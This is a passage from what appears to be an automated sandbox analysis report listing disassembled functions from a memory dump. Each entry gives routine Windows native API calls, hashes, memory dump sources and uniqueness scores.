                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateCultureFreeInitNameStringUnicode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3431183669-0
                                                                                                                            • Opcode ID: 74f7cbef4658aaa41d8116a5e8e660c2874a3b3c6bc41ec9a86e3a9d0c706b81
                                                                                                                            • Instruction ID: 4d7734fd7dec6f7770c231141c1c6db04c8ed5a17202ffaaaf29a1ecae801dca
                                                                                                                            • Opcode Fuzzy Hash: 74f7cbef4658aaa41d8116a5e8e660c2874a3b3c6bc41ec9a86e3a9d0c706b81
                                                                                                                            • Instruction Fuzzy Hash: D891EF71A083569BD716CF28C080BAAB7E1FF95755F01495EF891CF2A1D378C882C7A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D5AC0, Relevance: 9.2, APIs: 6, Instructions: 222COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.1105(?,?,00000200,?,000001FF,?,?,?,?), ref: 6B1D5BE1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3510742995-0
                                                                                                                            • Opcode ID: 489531418fbf08e8d0f9eb1835df9ff9c87241a69b85caf0543e2027e71bbeb9
                                                                                                                            • Instruction ID: 344d94c3944720ade7e79ce6242cdd734d95957d23e321cd9ce32b361f8655ef
                                                                                                                            • Opcode Fuzzy Hash: 489531418fbf08e8d0f9eb1835df9ff9c87241a69b85caf0543e2027e71bbeb9
                                                                                                                            • Instruction Fuzzy Hash: 0981A6B1A0053D9BDB208A28CD80BDA77F9EF45715F0045E9DA55E32C1EB78D9C1CBA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A2EF7, Relevance: 9.2, APIs: 6, Instructions: 183timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _allshl.1105(?,00000000,00000000,00000000,?,?,?,?,6B29B632,?,00000000), ref: 6B2A303C
                                                                                                                            • _allshl.1105(?,00000000,00000000,00000000,?,?,?,?,6B29B632,?,00000000), ref: 6B2A3049
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,?,00000000,00000000,00000000,?,?,?,?,6B29B632,?,00000000), ref: 6B2A305E
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,?,?,?,00000000,00000000,00000000,?,?,?), ref: 6B2A3081
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,?,?,?,00000000,00000000,00000000,?,?,?), ref: 6B2A30AF
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?), ref: 6B2A30DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: DebugExclusiveLockPrintTimes_allshl$AcquireRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4236268356-0
                                                                                                                            • Opcode ID: d1896a7368af237121f1258379cb316d91c95d8d4db5f65b2dc5a02ec77a84f3
                                                                                                                            • Instruction ID: 04fbe4100948cfe90627864fd187a6dd67d026f8e196d7bd0cb7a3134bddb6d6
                                                                                                                            • Opcode Fuzzy Hash: d1896a7368af237121f1258379cb316d91c95d8d4db5f65b2dc5a02ec77a84f3
                                                                                                                            • Instruction Fuzzy Hash: 17513A726142599FC714CF2AC89156ABBF5FFC931170582AAE898DB281DB34DC05CBD0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DB171, Relevance: 9.2, APIs: 6, Instructions: 166nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwQueryDebugFilterState.1105(?,6B21B627,6B2AF7A8,00000090,6B1DB16E,00000003,6B21B627,0000000A,00000001,00000000,0000000A,6B21B627,Invalid parameter passed to C runtime function.), ref: 6B1DB1C4
                                                                                                                            • _alloca_probe_16.1105(6B2AF7A8,00000090,6B1DB16E,00000003,6B21B627,0000000A,00000001,00000000,0000000A,6B21B627,Invalid parameter passed to C runtime function.), ref: 6B234835
                                                                                                                            • memcpy.1105(?,?,?,6B2AF7A8,00000090,6B1DB16E,00000003,6B21B627,0000000A,00000001,00000000,0000000A,6B21B627), ref: 6B234866
                                                                                                                            • _vsnprintf.1105(?,-00000081,?,?,0000000A,6B21B627), ref: 6B2348AD
                                                                                                                            • ZwWow64DebuggerCall.1105(00000001,00000000,7FFE02D4,?,6B21B627,6B2AF7A8,00000090,6B1DB16E,00000003,6B21B627,0000000A,00000001,00000000,0000000A,6B21B627,Invalid parameter passed to C runtime function.), ref: 6B234986
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CallDebugDebuggerFilterQueryStateWow64_alloca_probe_16_vsnprintfmemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1346858437-0
                                                                                                                            • Opcode ID: 01ee2e563fc75c1ea4431fa4d9392063884dfc2bf5d6c7c602f1476a453b88ba
                                                                                                                            • Instruction ID: 38a074b9e20136bb009804c0d814745ec523ea5d3f2dd12407fe759cce80e9c8
                                                                                                                            • Opcode Fuzzy Hash: 01ee2e563fc75c1ea4431fa4d9392063884dfc2bf5d6c7c602f1476a453b88ba
                                                                                                                            • Instruction Fuzzy Hash: 1251E3B1D1426E8FDB21CF78C8D5BAEBBF1BF05714F1041E9D869AB281D73A49418B90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A740D, Relevance: 9.1, APIs: 6, Instructions: 141memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlCompareMemory.1105(00000018,?,00000000,00000000,00000000,00000000,00000000,00000000,?,6B2514C4,0000000C,?,?,00000000,00000066,00000000), ref: 6B2A743C
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,0000001A,00000000,00000000,00000000,00000000,00000000,?,6B2514C4,0000000C,?,?,00000000,00000066,00000000), ref: 6B2A7464
                                                                                                                            • memcpy.1105(00000018,?,00000000,?,00000008,0000001A,00000000,00000000,00000000,00000000,00000000,?,6B2514C4,0000000C,?,?), ref: 6B2A7484
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,00000018,00000000,00000066,00000000), ref: 6B2A74AC
                                                                                                                            • memcmp.1105(00000066,00000008,00000010,00000018,?,00000000,00000000,00000000,00000000,00000000,00000000,?,6B2514C4,0000000C,?,?), ref: 6B2A7527
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,00000018,00000000,00000066,00000000), ref: 6B2A7546
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap$CompareMemorymemcmpmemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3500240269-0
                                                                                                                            • Opcode ID: 53f0b23cde38d8cbdebcfad0d89ab03898b2aa5ba471344c79297c4b5cd44298
                                                                                                                            • Instruction ID: 7c7c7c2b6be44cb23a57d1604d59fa22fbf9b1b4b53e40def16f6a42d893d3e0
                                                                                                                            • Opcode Fuzzy Hash: 53f0b23cde38d8cbdebcfad0d89ab03898b2aa5ba471344c79297c4b5cd44298
                                                                                                                            • Instruction Fuzzy Hash: F651AC7160060AEFDB15CF54C580A86BBF9FF45305F14C0BAE9089F266E375EA46CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E0100, Relevance: 9.1, APIs: 6, Instructions: 122nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C861C,6B2AF848,0000001C,6B1DF66C,?,00000000,6B2C52D8), ref: 6B1E0120
                                                                                                                            • ZwUnmapViewOfSection.1105(000000FF,?,6B2C861C,6B2AF848,0000001C,6B1DF66C,?,00000000,6B2C52D8), ref: 6B1E01AF
                                                                                                                            • ZwClose.1105(?,000000FF,?,6B2C861C,6B2AF848,0000001C,6B1DF66C,?,00000000,6B2C52D8), ref: 6B1E01BD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AcquireCloseExclusiveLockSectionUnmapView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1629747488-0
                                                                                                                            • Opcode ID: b453404dac39e6f75d20c6d8ca0d265aacbe05d5288882b417056e332af9b9ce
                                                                                                                            • Instruction ID: 5da8400b0a7a0ca58832832146f6bb4ad7ef01eec336323d8ef517e1fcd8c329
                                                                                                                            • Opcode Fuzzy Hash: b453404dac39e6f75d20c6d8ca0d265aacbe05d5288882b417056e332af9b9ce
                                                                                                                            • Instruction Fuzzy Hash: B941DE71988619EFCF42CF68C8D5BAA77F4BF06755F050155E410AB392CB3AC942CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B255623, Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,00000002,?,6B24E4BC,6B2B03D0,0000000C,6B249687,00000000,00000000,00000001,?,?,7FFE0386,?,6B1D6778,00000001), ref: 6B255628
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B255661
                                                                                                                            • RtlTryEnterCriticalSection.1105(6B2C5350,00000000,00000002,?,6B24E4BC,6B2B03D0,0000000C,6B249687,00000000,00000000,00000001,?,?,7FFE0386,?,6B1D6778), ref: 6B25569B
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(6B2C5350,00000000,00000002,?,6B24E4BC,6B2B03D0,0000000C,6B249687,00000000,00000000,00000001,?,?,7FFE0386,?,6B1D6778), ref: 6B2556A2
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B2556D2
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B25572F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession$CriticalEnterSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1555030633-0
                                                                                                                            • Opcode ID: af8963e79314cc8aae913ed86f132064f0e4507faef6be79c40d7519a2facbaa
                                                                                                                            • Instruction ID: 6c30191f848767dc0c764444250197957a80ddcf8c13fdef5c47e998f991263b
                                                                                                                            • Opcode Fuzzy Hash: af8963e79314cc8aae913ed86f132064f0e4507faef6be79c40d7519a2facbaa
                                                                                                                            • Instruction Fuzzy Hash: E53183326556C69BE7228738CDC4F2437D8AF45B65F2403E0EA308B6E2DB6CD421C611
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B29A189, Relevance: 9.1, APIs: 6, Instructions: 96nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C6220,00000000,?,?,?), ref: 6B29A1AE
                                                                                                                            • ZwGetNlsSectionPtr.1105(0000000C,?,00000000,?,?,6B2C6220,00000000,?,?,?), ref: 6B29A1E8
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C6220,?,00000000,00000000,?,0000000C,?,00000000,00000050,6B2C6220,00000000,?,?,?), ref: 6B29A252
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireReleaseSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1496884002-0
                                                                                                                            • Opcode ID: cf62402a0fa8a61788be4215094a7d46d5d0373bbf313e8ce5cefae48e3c6050
                                                                                                                            • Instruction ID: 8969d124ab3e521e51a08c7c68ac1e71cfc7e2d94fcf3f84af4af261236d004f
                                                                                                                            • Opcode Fuzzy Hash: cf62402a0fa8a61788be4215094a7d46d5d0373bbf313e8ce5cefae48e3c6050
                                                                                                                            • Instruction Fuzzy Hash: 3E31E431E4070DABD7119FAAE8C1A6BBBF9EB46714F100079F519DB280DB78DD018791
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DF7C0, Relevance: 9.1, APIs: 6, Instructions: 64nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(00000058,00000000,00000000,00000000,?,6B2476A7,?,?,00000000,6B1B67CC,00000000,00000000,?,00000040), ref: 6B1DF7F5
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(00000058,00000058,00000000,00000000,00000000,?,6B2476A7,?,?,00000000,6B1B67CC,00000000,00000000,?,00000040), ref: 6B1DF860
                                                                                                                              • Part of subcall function 6B1DF8C8: RtlAcquireSRWLockExclusive.1105(6B2C86AC,00000058,?,00000030,6B1DF813,00000058,00000000,00000000,00000000,?,6B2476A7,?,?,00000000,6B1B67CC,00000000), ref: 6B1DF8D5
                                                                                                                              • Part of subcall function 6B1DF8C8: RtlRbRemoveNode.1105(6B2C86DC,00000030,6B2C86AC,00000058,?,00000030,6B1DF813,00000058,00000000,00000000,00000000,?,6B2476A7,?,?,00000000), ref: 6B1DF8E0
                                                                                                                              • Part of subcall function 6B1DF8C8: RtlReleaseSRWLockExclusive.1105(6B2C86AC,6B2C86DC,00000030,6B2C86AC,00000058,?,00000030,6B1DF813,00000058,00000000,00000000,00000000,?,6B2476A7,?,?), ref: 6B1DF8EE
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(00000058,00000058,00000000,00000000,00000000,?,6B2476A7,?,?,00000000,6B1B67CC,00000000,00000000,?,00000040), ref: 6B1DF814
                                                                                                                            • ZwClose.1105(?,00000058,00000058,00000000,00000000,00000000,?,6B2476A7,?,?,00000000,6B1B67CC,00000000,00000000,?,00000040), ref: 6B1DF82E
                                                                                                                            • RtlSetLastWin32Error.1105(00000006,00000000,00000000,00000000,?,6B2476A7,?,?,00000000,6B1B67CC,00000000,00000000,?,00000040), ref: 6B1DF867
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$Release$Acquire$CloseErrorLastNodeRemoveWin32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2169420607-0
                                                                                                                            • Opcode ID: 1a2e9108ca8d82345a412f524375ea021ed692e5b5e4c4b702d8ff433db74713
                                                                                                                            • Instruction ID: 7d90028706c1ecf837742e7e167d1e46b269d1da1e65fb65a284a47dc3506657
                                                                                                                            • Opcode Fuzzy Hash: 1a2e9108ca8d82345a412f524375ea021ed692e5b5e4c4b702d8ff433db74713
                                                                                                                            • Instruction Fuzzy Hash: AA11C436700205B7EB019F24C8C1FAA33A5FF91B15F604079ED255F149DB28D982C7A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B261242, Relevance: 9.0, APIs: 6, Instructions: 31nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwUnmapViewOfSection.1105(000000FF,?,6B26122C,6B2B07D0,00000058,6B260C91,?,00000000,?,00000000,?,?,?,6B28B56B,00000000,?), ref: 6B26124C
                                                                                                                            • ZwClose.1105(?,000000FF,?,6B26122C,6B2B07D0,00000058,6B260C91,?,00000000,?,00000000,?,?,?,6B28B56B,00000000), ref: 6B26125A
                                                                                                                            • ZwClose.1105(?,000000FF,?,6B26122C,6B2B07D0,00000058,6B260C91,?,00000000,?,00000000,?,?,?,6B28B56B,00000000), ref: 6B261267
                                                                                                                            • ZwClose.1105(?,6B26122C,6B2B07D0,00000058,6B260C91,?,00000000,?,00000000,?,?,?,6B28B56B,00000000,?,00000000), ref: 6B261275
                                                                                                                            • ZwClose.1105(?,6B26122C,6B2B07D0,00000058,6B260C91,?,00000000,?,00000000,?,?,?,6B28B56B,00000000,?,00000000), ref: 6B261286
                                                                                                                            • ZwClose.1105(?,6B26122C,6B2B07D0,00000058,6B260C91,?,00000000,?,00000000,?,?,?,6B28B56B,00000000,?,00000000), ref: 6B261297
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$SectionUnmapView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 682624529-0
                                                                                                                            • Opcode ID: df9b40cab72dcffc0bbba800b8aff6860ab2831aacd6ae3e33e08911f29cf166
                                                                                                                            • Instruction ID: 9f6cf062e518a91bcd0900274fe0c73ce3e87fd76ddf5ac06e2a0f4ce8f8cc2c
                                                                                                                            • Opcode Fuzzy Hash: df9b40cab72dcffc0bbba800b8aff6860ab2831aacd6ae3e33e08911f29cf166
                                                                                                                            • Instruction Fuzzy Hash: 78F0F970D1512DBBDF059FB5D8C579EBAF1AF0028AF101168F120711E1EB7958E2CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B200548, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.1105(6B2C7B60,?,00000000,01000000,?,6B200408,?,00000000,00000024), ref: 6B200576
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C7B60,6B2C8544,?,00000001,?,?,?,?,?,6B2C7B60,?,00000000,01000000), ref: 6B20059F
                                                                                                                            • RtlRbInsertNodeEx.1105(6B2C8544,?,00000001,?,?,?,?,?,6B2C7B60,?,00000000,01000000), ref: 6B2005F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterInsertLeaveNode
                                                                                                                            • String ID: @{,k
                                                                                                                            • API String ID: 1141981990-27644910
                                                                                                                            • Opcode ID: ea7f5e6aa26f07ddc9e2e2b9f7376222087d22eb35b2a895e79e281269c5cb41
                                                                                                                            • Instruction ID: 12f2fae080f369cad5d1b7bb8b703e3df91ff14f77324e553b60bcf427c78359
                                                                                                                            • Opcode Fuzzy Hash: ea7f5e6aa26f07ddc9e2e2b9f7376222087d22eb35b2a895e79e281269c5cb41
                                                                                                                            • Instruction Fuzzy Hash: 5F515631E5821EAFE7118E69C8C0F1BBBF5AFC5715F1401A5E914EB280EBB8D901C7A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D4439, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 129COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0$Flst
                                                                                                                            • API String ID: 0-758220159
                                                                                                                            • Opcode ID: f3de85f26fa098fb93aafde0d659a213cb0eda5bc7d8293ff67a8513e00f4c76
                                                                                                                            • Instruction ID: c6def59a6f1aa1289452f2c0e5812d70766ef6c65d5cf8ed04b03b44342106fa
                                                                                                                            • Opcode Fuzzy Hash: f3de85f26fa098fb93aafde0d659a213cb0eda5bc7d8293ff67a8513e00f4c76
                                                                                                                            • Instruction Fuzzy Hash: 5C41BDB1E04648DFDB24CF99C49479EFBF5EF54715F10846ED0499B240D7389882CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DBAA0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000,0000EEEE,?), ref: 6B1DBAE6
                                                                                                                            • ZwOpenKey.1105(?,?,?,?,?,00020019,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000,0000EEEE,?), ref: 6B1DBB24
                                                                                                                              • Part of subcall function 6B219600: LdrInitializeThunk.NTDLL(6B211119,?,?,00000018,?), ref: 6B21960A
                                                                                                                            Strings
                                                                                                                            • @, xrefs: 6B1DBB14
                                                                                                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 6B1DBADC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitInitializeOpenStringThunkUnicode
                                                                                                                            • String ID: @$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                            • API String ID: 3332659491-3339074665
                                                                                                                            • Opcode ID: 987730e16517ee3c291c2b9e17b88ab0cc890d956eb787ac239b24b80c276ba6
                                                                                                                            • Instruction ID: 6f5e14d3457a2266afc1bed740a15c3d49ed36d16f9a41a95769edc0355e36b6
                                                                                                                            • Opcode Fuzzy Hash: 987730e16517ee3c291c2b9e17b88ab0cc890d956eb787ac239b24b80c276ba6
                                                                                                                            • Instruction Fuzzy Hash: FC31C271908325ABC715CF24C180A6BB7F5EF85714F01895EF8A58B344E739DD0ACBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20D294, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93memorynativefileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwQueryAttributesFile.1105(?,?,?,?), ref: 6B20D313
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,?,?,?,?), ref: 6B20D330
                                                                                                                            • ZwClose.1105(00000000,?,?,?,?), ref: 6B24B001
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,00000000,?,?,?,?), ref: 6B24B011
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap$AttributesCloseFileQuery
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 2866988855-2766056989
                                                                                                                            • Opcode ID: 0e51bd2c46cd04eef895492f296f90266889a9125b4dfb1e1be2206590c8fc70
                                                                                                                            • Instruction ID: 1c49df7ce2c148290102cd82ac7ef596a204509a143ddd1fbc2510ad3eb5e670
                                                                                                                            • Opcode Fuzzy Hash: 0e51bd2c46cd04eef895492f296f90266889a9125b4dfb1e1be2206590c8fc70
                                                                                                                            • Instruction Fuzzy Hash: 1E317CB159930AAFC310CF28C981A5BBBE8EB85794F00096EF99483250DB39DD05CF93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B25EA20, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
